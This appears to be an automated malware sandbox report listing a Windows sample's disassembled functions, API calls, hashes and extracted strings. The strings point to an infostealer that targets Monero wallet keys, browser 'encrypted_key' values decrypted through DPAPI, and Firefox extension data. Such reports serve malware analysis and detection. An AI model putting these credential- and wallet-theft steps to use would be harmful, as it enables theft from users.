                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: b0b104033c1ea0605a949b66932dfac66295749cd9997c4e5ee9e44bbe23d4c2
                          • Instruction ID: 6987a6248ac07af5dba19a938cf151e96d0c675a48c72d7252e5de1b2fa737a9
                          • Opcode Fuzzy Hash: b0b104033c1ea0605a949b66932dfac66295749cd9997c4e5ee9e44bbe23d4c2
                          • Instruction Fuzzy Hash: 0581F072A101189BCB05FBA4ECA6EEEB33DAF55300F404569F55766093EF346A08CB76
                          Function 0009FED7 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AdjustPointer
                          • String ID:
                          • API String ID: 1740715915-0
                          • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                          • Instruction ID: f8255f2147562729de0d4da9053a9b3c5c8ccd4fe005310c32d0359df2101024
                          • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                          • Instruction Fuzzy Hash: 5E51B17260120AAFEF29CF64C851BBA77A4FF02310F24413DE905865A2E731ED50EB90
                          Function 0002A560 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 158memoryCOMMON
                          Download Yara Rule
                          APIs
                          • LocalAlloc.KERNEL32(00000040,?), ref: 0002A664
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocLocallstrcpy
                          • String ID: @$v10$v20
                          • API String ID: 2746078483-278772428
                          • Opcode ID: 84190163a25ebfee19e75ca229a82246a180a66f9b8a1fe0d856046f40b62a9f
                          • Instruction ID: 55cd4eb31b4ef30964be2f087499606ef6ac234bec57c184ca0738609715253d
                          • Opcode Fuzzy Hash: 84190163a25ebfee19e75ca229a82246a180a66f9b8a1fe0d856046f40b62a9f
                          • Instruction Fuzzy Hash: 39515C70B10218EFDB24DFA4DD95FEDB77AAF41304F008018E94A6F292DB706A05CB56
                          Function 0002F5A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0003AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0003AAF6
                            • Part of subcall function 0002A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0002A13C
                            • Part of subcall function 0002A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0002A161
                            • Part of subcall function 0002A110: LocalAlloc.KERNEL32(00000040,?), ref: 0002A181
                            • Part of subcall function 0002A110: ReadFile.KERNEL32(000000FF,?,00000000,0002148F,00000000), ref: 0002A1AA
                            • Part of subcall function 0002A110: LocalFree.KERNEL32(0002148F), ref: 0002A1E0
                            • Part of subcall function 0002A110: CloseHandle.KERNEL32(000000FF), ref: 0002A1EA
                            • Part of subcall function 00038FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00038FE2
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                            • Part of subcall function 0003ACC0: lstrlen.KERNEL32(?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 0003ACD5
                            • Part of subcall function 0003ACC0: lstrcpy.KERNEL32(00000000), ref: 0003AD14
                            • Part of subcall function 0003ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0003AD22
                            • Part of subcall function 0003ABB0: lstrcpy.KERNEL32(?,00040E1A), ref: 0003AC15
                            • Part of subcall function 0003AC30: lstrcpy.KERNEL32(00000000,?), ref: 0003AC82
                            • Part of subcall function 0003AC30: lstrcat.KERNEL32(00000000), ref: 0003AC92
                          • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00041678,00040D93), ref: 0002F64C
                          • lstrlen.KERNEL32(00000000), ref: 0002F66B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                          • String ID: ^userContextId=4294967295$moz-extension+++
                          • API String ID: 998311485-3310892237
                          • Opcode ID: fccb7b1e0ffeff93765f3ad98dbb0d4d4236460657f39f1182c02e8fd3839f4a
                          • Instruction ID: 1e2675ebd1ca6f97c254c0df3611249cc8d07b024e7e97969a647690b3384a03
                          • Opcode Fuzzy Hash: fccb7b1e0ffeff93765f3ad98dbb0d4d4236460657f39f1182c02e8fd3839f4a
                          • Instruction Fuzzy Hash: F851EC72E101089BCB05FBA4EDA6DEEB37DAF55300F408568F55667193EF346A08CB62
                          Function 000337B0 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID:
                          • API String ID: 367037083-0
                          • Opcode ID: 93e23c8788df97cc33d3a5976cfd8d8b35fe841bc3504f011e9080d22cc3553c
                          • Instruction ID: 957d7b09b8a5db61c1569fe44b3aa5bae57736b637a06de016e14f25b400414c
                          • Opcode Fuzzy Hash: 93e23c8788df97cc33d3a5976cfd8d8b35fe841bc3504f011e9080d22cc3553c
                          • Instruction Fuzzy Hash: DA4131B1E10209DBDB05EFA4D895AFEB77CAF55304F008029F51677191EB74AA04CFA6
                          Function 0002A430 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                            • Part of subcall function 0002A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0002A13C
                            • Part of subcall function 0002A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0002A161
                            • Part of subcall function 0002A110: LocalAlloc.KERNEL32(00000040,?), ref: 0002A181
                            • Part of subcall function 0002A110: ReadFile.KERNEL32(000000FF,?,00000000,0002148F,00000000), ref: 0002A1AA
                            • Part of subcall function 0002A110: LocalFree.KERNEL32(0002148F), ref: 0002A1E0
                            • Part of subcall function 0002A110: CloseHandle.KERNEL32(000000FF), ref: 0002A1EA
                            • Part of subcall function 00038FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00038FE2
                          • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0002A489
                            • Part of subcall function 0002A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00024F3E,00000000,00000000), ref: 0002A23F
                            • Part of subcall function 0002A210: LocalAlloc.KERNEL32(00000040,?,?,?,00024F3E,00000000,?), ref: 0002A251
                            • Part of subcall function 0002A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00024F3E,00000000,00000000), ref: 0002A27A
                            • Part of subcall function 0002A210: LocalFree.KERNEL32(?,?,?,?,00024F3E,00000000,?), ref: 0002A28F
                            • Part of subcall function 0002A2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0002A2D4
                            • Part of subcall function 0002A2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 0002A2F3
                            • Part of subcall function 0002A2B0: LocalFree.KERNEL32(?), ref: 0002A323
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                          • String ID: $"encrypted_key":"$DPAPI
                          • API String ID: 2100535398-738592651
                          • Opcode ID: a34471ccc90ede56cde3eede01e33725d79b4bcca1b2f741a4d077d76fe35a4e
                          • Instruction ID: b292a86e038cfbc4dbe5295969030e824512ea89e1170b9ace4c7d6bcd911be4
                          • Opcode Fuzzy Hash: a34471ccc90ede56cde3eede01e33725d79b4bcca1b2f741a4d077d76fe35a4e
                          • Instruction Fuzzy Hash: 663164B6E00619ABCF04DFD4ED45AEFB7B8BF59344F444558E905A7242EB309E04CBA2
                          Function 00038810 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,000405BF), ref: 0003885A
                          • Process32First.KERNEL32(?,00000128), ref: 0003886E
                          • Process32Next.KERNEL32(?,00000128), ref: 00038883
                            • Part of subcall function 0003ACC0: lstrlen.KERNEL32(?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 0003ACD5
                            • Part of subcall function 0003ACC0: lstrcpy.KERNEL32(00000000), ref: 0003AD14
                            • Part of subcall function 0003ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0003AD22
                            • Part of subcall function 0003ABB0: lstrcpy.KERNEL32(?,00040E1A), ref: 0003AC15
                          • CloseHandle.KERNEL32(?), ref: 000388F1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                          • String ID:
                          • API String ID: 1066202413-0
                          • Opcode ID: 88a726e3d89f16807c233360b004e886b49388ccf9fe44ceeaacad0d7db00f05
                          • Instruction ID: cb89a5ce80b57f22168e282cf4053ae7387a9f949c383c5ec44f66ba67094183
                          • Opcode Fuzzy Hash: 88a726e3d89f16807c233360b004e886b49388ccf9fe44ceeaacad0d7db00f05
                          • Instruction Fuzzy Hash: 9F315971A01218ABCB26DF95DC55FEEB37CEB06700F1041E9F10EA61A1DB306A44CFA1
                          Function 0009FDF7 Relevance: 6.1, APIs: 4, Instructions: 60COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0009FE13
                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0009FE2C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Value___vcrt_
                          • String ID:
                          • API String ID: 1426506684-0
                          • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                          • Instruction ID: e2c1acad3b99349845afdf79d926a9fc4c1099218b86888c18db8b087424bc6c
                          • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                          • Instruction Fuzzy Hash: EB017C32209762AEFE7526B45CC9EFA3694EB027B5B34433AF616C51F3EF914C41A140
                          Function 00039470 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileA.KERNEL32(00033D3E,80000000,00000003,00000000,00000003,00000080,00000000,?,00033D3E,?), ref: 0003948C
                          • GetFileSizeEx.KERNEL32(000000FF,00033D3E), ref: 000394A9
                          • CloseHandle.KERNEL32(000000FF), ref: 000394B7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseCreateHandleSize
                          • String ID:
                          • API String ID: 1378416451-0
                          • Opcode ID: 3bdd07a98202b780da56a46f2a5d71585ab36c7d3501035ef623ef06bc98e5b9
                          • Instruction ID: 920c10f47ece3fcfb5a28f4eb144232cf755be6b8a7706c3a7c69c49d3c08f04
                          • Opcode Fuzzy Hash: 3bdd07a98202b780da56a46f2a5d71585ab36c7d3501035ef623ef06bc98e5b9
                          • Instruction Fuzzy Hash: 60F0FF39E54208BBDB10DFB4EC49FAF77B9AB48711F10C664FA15A7280E6B49605DF80
                          Function 0003CA72 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __getptd.LIBCMT ref: 0003CA7E
                            • Part of subcall function 0003C2A0: __amsg_exit.LIBCMT ref: 0003C2B0
                          • __getptd.LIBCMT ref: 0003CA95
                          • __amsg_exit.LIBCMT ref: 0003CAA3
                          • __updatetlocinfoEx_nolock.LIBCMT ref: 0003CAC7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                          • String ID:
                          • API String ID: 300741435-0
